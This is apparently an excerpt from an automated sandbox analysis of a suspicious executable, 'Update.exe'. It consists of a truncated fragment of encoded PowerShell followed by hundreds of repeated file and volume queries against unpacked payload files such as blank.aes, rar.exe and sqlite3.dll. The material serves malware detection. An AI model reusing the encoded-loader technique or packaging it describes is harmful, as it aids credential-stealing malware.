caacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F99570 cpuid 0_2_00007FF623F99570
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_ctypes.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\bound.blank VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\python310.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\rarreg.key VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\sqlite3.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\unicodedata.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_bz2.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_ctypes.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_decimal.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_hashlib.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_socket.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_ssl.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_lzma.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_bz2.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_sqlite3.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_socket.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\select.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_ssl.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_hashlib.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
